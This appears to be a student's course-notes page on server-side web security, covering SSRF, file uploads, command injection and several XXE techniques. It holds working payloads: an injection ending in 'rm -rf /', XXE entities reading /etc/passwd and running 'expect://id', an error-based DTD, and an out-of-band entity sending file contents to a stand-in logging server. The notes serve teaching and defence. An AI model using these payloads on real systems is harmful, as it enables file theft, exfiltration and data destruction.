<!doctype html><html lang=en><head><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge,chrome=1"><title>Server Side Security - COMP6443 Musings</title><meta name=renderer content=webkit><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1"><meta http-equiv=cache-control content=no-transform><meta http-equiv=cache-control content=no-siteapp><meta name=theme-color content=#f8f5ec><meta name=msapplication-navbutton-color content=#f8f5ec><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=#f8f5ec><meta name=author content=z5206677><meta name=description content="Server Side Security Server Side Request Forgery (SSRF) Make the server do something it&amp;rsquo;s not intended to."><meta name=keywords content=Hugo,theme,even><meta name=generator content="Hugo 0.58.2 with theme even"><link rel=canonical href=../../post/server-side-security/><link rel=apple-touch-icon sizes=180x180 href=../../apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=../../favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=../../favicon-16x16.png><link rel=manifest href=../../manifest.json><link rel=mask-icon href=../../safari-pinned-tab.svg color=#5bbad5><link href=../../dist/even.c2a46f00.min.css rel=stylesheet><link rel=stylesheet href=https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.css integrity="sha256-7TyXnr2YU040zfSP+rEcz29ggW4j56/ujTPwjMzyqFY=" crossorigin=anonymous><link rel=stylesheet href=../../css/overrides.css><link rel=stylesheet href=../../css/typedjs.shortcode.css><meta property=og:title content="Server Side Security"><meta property=og:description content="Server Side Security Server Side Request Forgery (SSRF) Make the server do something it&rsquo;s not intended to."><meta property=og:type content=article><meta property=og:url content=/post/server-side-security/><meta property=article:published_time content=2020-06-29T18:00:00+10:00><meta property=article:modified_time content=2020-06-29T18:00:00+10:00><meta itemprop=name content="Server Side Security"><meta itemprop=description content="Server Side Security Server Side Request Forgery (SSRF) Make the server do something it&rsquo;s not intended to."><meta itemprop=datePublished content=2020-06-29T18:00:00&#43;10:00><meta itemprop=dateModified content=2020-06-29T18:00:00&#43;10:00><meta itemprop=wordCount content=862><meta itemprop=keywords content><meta name=twitter:card content=summary><meta name=twitter:title content="Server Side Security"><meta name=twitter:description content="Server Side Security Server Side Request Forgery (SSRF) Make the server do something it&rsquo;s not intended to."><!--[if lte IE 9]><script src=https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js></script><![endif]--><!--[if lt IE 9]><script src=https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js></script><script src=https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js></script><![endif]--></head><body><div id=mobile-navbar class=mobile-navbar><div class=mobile-header-logo><a href=../../ class=logo>COMP6443 Musings</a></div><div class=mobile-navbar-icon><span></span><span></span><span></span></div></div><nav id=mobile-menu class="mobile-menu slideout-menu"><ul class=mobile-menu-list><a href=../../><li class=mobile-menu-item>Home</li></a><a href=https://github.com/featherbear/UNSW-COMP6443><li class=mobile-menu-item>GitHub</li></a><a href=../../categories/report><li class=mobile-menu-item>Report</li></a><a href=../../categories/><li class=mobile-menu-item>Categories</li></a></ul></nav><div class=container id=mobile-panel><header id=header class=header><div class=logo-wrapper><a href=../../ class=logo>COMP6443 Musings</a></div><nav class=site-navbar><ul id=menu class=menu><li class=menu-item><a class=menu-item-link href=../../>Home</a></li><li class=menu-item><a class=menu-item-link href=https://github.com/featherbear/UNSW-COMP6443>GitHub</a></li><li class=menu-item><a class=menu-item-link href=../../categories/report>Report</a></li><li class=menu-item><a class=menu-item-link href=../../categories/>Categories</a></li></ul></nav></header><main id=main class=main><div class=content-wrapper><div id=content class=content><article class=post><header class=post-header><h1 class=post-title>Server Side Security</h1><div class=post-meta><span class=post-time>2020-06-29</span></div></header><div class=post-toc id=post-toc><h2 class=post-toc-title>Contents</h2><div class="post-toc-content always-active"><nav id=TableOfContents><ul><li><a href=#server-side-security>Server Side Security</a><ul><li><a href=#server-side-request-forgery-ssrf>Server Side Request Forgery (SSRF)</a><ul><li><a href=#mitigation-against-ssrf>Mitigation against SSRF</a></li></ul></li><li><a href=#file-upload-vulnerabilities>File Upload Vulnerabilities</a></li><li><a href=#command-injection>Command Injection</a></li><li><a href=#server-side-includes>Server Side Includes</a></li><li><a href=#xml-attack>XML Attack</a><ul><li><a href=#crafting-an-attack>Crafting an Attack</a></li><li><a href=#crafting-an-attack-parameterised-entities>Crafting an Attack - Parameterised Entities</a></li><li><a href=#crafting-an-attack-error-based-xxe>Crafting an Attack - Error Based XXE</a></li><li><a href=#crafting-an-attack-local-dtd>Crafting an Attack - Local DTD</a></li><li><a href=#crafting-an-attack-out-of-band-exploits>Crafting an Attack - Out of Band Exploits</a></li><li><a href=#mitigating-xxe-attacks>Mitigating XXE Attacks</a></li></ul></li><li><a href=#python-library-fingerprinting>Python Library fingerprinting</a></li></ul></li></ul></nav></div></div><div class=post-content><h1 id=server-side-security>Server Side Security</h1><h2 id=server-side-request-forgery-ssrf>Server Side Request Forgery (SSRF)</h2><p>Make the server do something it&rsquo;s not intended to.<br>i.e. Access a server that should only be accessed locally / within the LAN</p><h3 id=mitigation-against-ssrf>Mitigation against SSRF</h3><ul><li>Protect your infrastructure!</li><li>Whitelist the allowed domains</li><li>Whitelist the allowed IPs</li><li>Disable internal domains</li><li>Disable internal IPs</li></ul><p>For AWS, this might involve blocking access to cloud metadata services (169.254.269.254)</p><h2 id=file-upload-vulnerabilities>File Upload Vulnerabilities</h2><ul><li>Where does the file get uploaded to, can we modify the URL to get access to other files?</li><li>Access control violation possiblities?</li><li><strong>Mitigation</strong> - Access control!</li><li>Crashing the server<ul><li>Very large files</li><li>Unzip bomb - Crash the server</li><li><strong>Mitigation</strong> - Max file limits, max recursion limits</li></ul></li><li>Can I upload a <a href=https://highon.coffee/blog/reverse-shell-cheat-sheet/>web shell</a>, and then access the shell<ul><li><strong>Mitigation</strong> - Run the web server in a restricted account!!!</li></ul></li></ul><h2 id=command-injection>Command Injection</h2><blockquote><p><code>$name = hek.pdf; rm -rf /</code><br>System: <code>cat $name</code> -&gt; <code>cat $name; rm -rf /</code></p></blockquote><ul><li>How does the server handle user input</li><li>Is user input being safely inserted?</li><li><strong>Mitigation</strong> - Ensure to escape and sanitise input</li></ul><h2 id=server-side-includes>Server Side Includes</h2><p>Where the server reads opens files in the system, as a result of malicious user input
* Can I reach network shares, other servers, the internet?</p><ul><li><strong>Mitigation</strong> - Sanitise input</li></ul><h2 id=xml-attack>XML Attack</h2><blockquote><p>XML is a markup language used to hierarchically describe data.<br>One feature they contain is the ability to import other documents (known as Document Type Definitions), but also external resources - which can be used as data results in the XML reponse.</p></blockquote><p><u>This is bad</u>, we can perform Local File Inclusion (LFI): <code>&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;</code></p><p>Read: <a href=https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection</a></p><h3 id=crafting-an-attack>Crafting an Attack</h3><p>We first define our DOCTYPE</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=lnt>1
</span><span class=lnt>2
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=cp>&lt;!DOCTYPE foo [
</span><span class=cp>]&gt;</span></code></pre></td></tr></table></div></div><p>Then we can attach our <code>&lt;!ENTITY variable data&gt;</code> inside the <code>[ ... ]</code> pair.</p><p><strong>Examples</strong></p><ul><li><code>&lt;!ENTITY usualEntity &quot;Hello&quot;&gt;</code></li><li><code>&lt;!ENTITY passwdFile SYSTEM &quot;file:///etc/passwd&quot;&gt;</code></li><li><code>&lt;!ENTITY localOnlyFile SYSTEM &quot;http://localhost:1111/text.txt&quot;&gt;</code></li><li><code>&lt;!ENTITY programResult SYSTEM &quot;expect://id&quot;&gt;</code> <em>(Often won&rsquo;t work as <code>expect</code> needs to be explicitly enabled by the admin)</em></li></ul><p>To access these data elements, we call them like <code>&amp;var;</code> in the XML contents.</p><p>For example</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=lnt>1
</span><span class=lnt>2
</span><span class=lnt>3
</span><span class=lnt>4
</span><span class=lnt>5
</span><span class=lnt>6
</span><span class=lnt>7
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=cp>&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;</span>
<span class=cp>&lt;!DOCTYPE foo [
</span><span class=cp>  &lt;!ENTITY passwdFile SYSTEM &#34;file:///etc/passwd&#34;&gt;</span>
]&gt; 
<span class=nt>&lt;data&gt;</span>
  <span class=nt>&lt;item&gt;</span><span class=ni>&amp;passwdFile;</span><span class=nt>&lt;/item&gt;</span>
<span class=nt>&lt;/data&gt;</span></code></pre></td></tr></table></div></div><h3 id=crafting-an-attack-parameterised-entities>Crafting an Attack - Parameterised Entities</h3><p>There also exists parameterised entities, which can be references by other entities, but also &lsquo;executed&rsquo; - which we can take advantage of.</p><p>They are described as such: <code>&lt;!ENTITY % variable data&gt;</code><br><em>Note the &lsquo;% ` (percent, space)</em></p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=lnt>1
</span><span class=lnt>2
</span><span class=lnt>3
</span><span class=lnt>4
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=cp>&lt;!DOCTYPE foo [
</span><span class=cp>  &lt;!ENTITY % string &#34;woah&#34; &gt;</span>
  <span class=cp>&lt;!ENTITY % result &#34;Got me like: %string;&#34; &gt;</span>
]&gt;</code></pre></td></tr></table></div></div><h3 id=crafting-an-attack-error-based-xxe>Crafting an Attack - Error Based XXE</h3><p>We can perform error-based attacks, however we are required to load an external DTD file.<br>That is, the entity definition cannot be included in the local file :&lsquo;(</p><p><strong>XML</strong></p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=lnt>1
</span><span class=lnt>2
</span><span class=lnt>3
</span><span class=lnt>4
</span><span class=lnt>5
</span><span class=lnt>6
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=cp>&lt;?xml version=&#34;1.0&#34; ?&gt;</span>
<span class=cp>&lt;!DOCTYPE message [
</span><span class=cp>    &lt;!ENTITY % ext SYSTEM &#34;http://some.server/ext.dtd&#34;&gt;</span>
    %ext;
]&gt;
<span class=nt>&lt;message&gt;&lt;/message&gt;</span></code></pre></td></tr></table></div></div><p><strong>ext.dtd</strong></p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=lnt>1
</span><span class=lnt>2
</span><span class=lnt>3
</span><span class=lnt>4
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=cp>&lt;!ENTITY % file SYSTEM &#34;file:///etc/passwd&#34;&gt;</span>
<span class=cp>&lt;!ENTITY % eval &#34;&lt;!ENTITY &amp;#x25; error SYSTEM &#39;file:///nonexistent/%file;&#39;&gt;</span>&#34;&gt;
%eval;
%error;</code></pre></td></tr></table></div></div><p>Here, the <code>ext.dtd</code> file is retrieved and parsed.<br><code>%file;</code> contains the contents of the <code>/etc/passwd</code> file on the server machine.<br><code>%eval;</code> is an entity that produces another entity <em>(that has not yet been evaluated itself)</em>
<code>%error;</code> will attempt to actually fetch the contents of <code>/nonexistent/+YOURDATAHERE</code></p><p>It will cause an error as the file does not exist, and it will reveal the path which it tried to find.<br>The &lsquo;path&rsquo; will contain our LFI data</p><h3 id=crafting-an-attack-local-dtd>Crafting an Attack - Local DTD</h3><p>In the case where we cannot load external DTD&rsquo;s (as a result of firewalls, WAFs, etc), we can attempt to find a DTD file locally (via directory enumeration / recon) - that meets two criterion</p><p>1) A parameterised entity exists
2) That same parameterised entity is evaluated</p><blockquote><p>XML will only parse the first entity definition of a given name, so if we had</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=lnt>1
</span><span class=lnt>2
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=cp>&lt;!ENTITY % test &#34;1&#34;&gt;</span>
<span class=cp>&lt;!ENTITY % test &#34;2&#34;&gt;</span></code></pre></td></tr></table></div></div><p><code>%test;</code> will evaluate to <code>1</code></p></blockquote><p>After a file has been selected, we can declare the entity before the local DTD file is included, hence setting an entity to our own value (condition 1). The local DTD will then evaluate OUR value (condition 2) - causing OUR values to execute</p><h3 id=crafting-an-attack-out-of-band-exploits>Crafting an Attack - Out of Band Exploits</h3><p>In the event that we cannot see the output of our XML directly, we can use parameterised queries to make a request to a server that we own</p><div class=highlight><div class=chroma><table class=lntable><tr><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=lnt>1
</span><span class=lnt>2
</span><span class=lnt>3
</span></code></pre></td><td class=lntd><pre class=chroma><code class=language-xml data-lang=xml><span class=cp>&lt;!ENTITY % xxe SYSTEM &#34;file:///etc/passwd&#34; &gt;</span>
<span class=cp>&lt;!ENTITY %doit SYSTEM &#34;http://myloggingserver/?%xxe;&#34;&gt;</span>
%doit;</code></pre></td></tr></table></div></div><p>We will only get the first line of the file however, although we can attempt to encode it - depending on what the server is using.</p><p>If PHP is used, we can use <code>php://filter/convert.base64-encode/resource=/etc/passwd</code> which will b64 encode the <code>/etc/passwd</code> file.</p><h3 id=mitigating-xxe-attacks>Mitigating XXE Attacks</h3><ul><li>Disable External Entities</li><li>Don&rsquo;t use PHP</li><li>Don&rsquo;t use XML (xd)</li></ul><h2 id=python-library-fingerprinting>Python Library fingerprinting</h2><p>A Python server may require connectivity to a different server depending on the user input.<br>We can send a magic payload such as <code>http://1.1.1.1\x00&amp;@2.2.2.2#\x00@3.3.3.3/</code> to fingerprint what library is used by the server (We need to own the IPs 1.1.1.1, 2.2.2.2, 3.3.3.3)</p><p>If 1.1.1.1 - urllib2, httplib<br>if 2.2.2.2 - requests<br>if 3.3.3.3 - urllib</p></div><footer class=post-footer><nav class=post-nav><a class=prev href=../../post/course-ctf/week5/><i class="iconfont icon-left"></i><span class="prev-text nav-default">Course CTF: Week 5 &amp; 6</span>
<span class="prev-text nav-mobile">Prev</span></a>
<a class=next href=../../post/xss/><span class="next-text nav-default">XSS</span>
<span class="next-text nav-mobile">Next</span>
<i class="iconfont icon-right"></i></a></nav></footer></article></div></div></main><footer id=footer class=footer><div class=social-links><a href=mailto:z5206677@student.unsw.edu.au class="iconfont icon-email" title=email></a><a href=https://www.linkedin.com/in/andrewjinmengwong/ class="iconfont icon-linkedin" title=linkedin></a><a href=https://github.com/featherbear class="iconfont icon-github" title=github></a><a href=https://www.instagram.com/_andrewjwong/ class="iconfont icon-instagram" title=instagram></a><a href=../../index.xml type=application/rss+xml class="iconfont icon-rss" title=rss></a></div><div class=copyright><span class=power-by>Powered by <a class=hexo-link href=https://gohugo.io>Hugo</a></span>
<span class=division>|</span>
<span class=theme-info>Theme -
<a class=theme-link href=https://github.com/olOwOlo/hugo-theme-even>Even</a></span>
<span class=copyright-year>&copy;
2020
<span class=heart><i class="iconfont icon-heart"></i></span><span class=author>Andrew Wong (z5206677)</span></span></div></footer><div class=back-to-top id=back-to-top><i class="iconfont icon-up"></i></div></div><script src=https://cdn.jsdelivr.net/npm/jquery@3.2.1/dist/jquery.min.js integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin=anonymous></script><script src=https://cdn.jsdelivr.net/npm/slideout@1.0.1/dist/slideout.min.js integrity="sha256-t+zJ/g8/KXIJMjSVQdnibt4dlaDxc9zXr/9oNPeWqdg=" crossorigin=anonymous></script><script src=https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.1.20/dist/jquery.fancybox.min.js integrity="sha256-XVLffZaxoWfGUEbdzuLi7pwaUJv1cecsQJQqGLe7axY=" crossorigin=anonymous></script><script type=text/javascript src=../../dist/even.26188efa.min.js></script><script type=application/javascript>var doNotTrack=false;if(!doNotTrack){window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;ga('create','UA-107434487-2','auto');ga('send','pageview');}</script><script async src=https://www.google-analytics.com/analytics.js></script><script src=../../js/typed.js@2.0.9></script><script src=../../js/typedjs.shortcode.js></script><script src=../../js/offsite.js></script></body></html>